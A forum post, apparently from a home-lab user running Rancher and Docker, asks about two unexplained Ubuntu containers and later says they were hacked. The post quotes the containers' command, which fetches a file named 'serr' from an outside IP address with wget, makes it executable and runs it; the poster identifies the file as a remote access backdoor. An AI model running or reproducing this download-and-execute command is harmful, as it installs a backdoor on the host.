PLEASE CLOSE THIS. I was hacked, the serr file is a remote access backdoor. I will take appropriate action. Sorry for posting of topic.
OK, So I have been experimenting with rancher on my home lab, creating and tearing down different environments and I figured out that there are sometimes containers left behined like in swarm that will restart ans show up on one host or the other as a standalone container. However today I have 2 standalone containers that appeared to be started 7 hours before i looked and i cant make sense of them.
they are both ubuntu and refer to an ip address im the command i can’t figure out::
Command:
/bin/bash,-c, apt update;apt install wget -y;wget http://140.82.21.105/serr;chmod 777 serr;./serr;while true;do echo helloworld;sleep 20; done;
the address shows an unmodified apache server and the /serr is a file,
has someone got me? and how would they start a docker container without showing up in any logs i know about on the host.
Or is this another learning curve. the ip address is not registered to any corp so i canty figure nit out.
thanks in advance.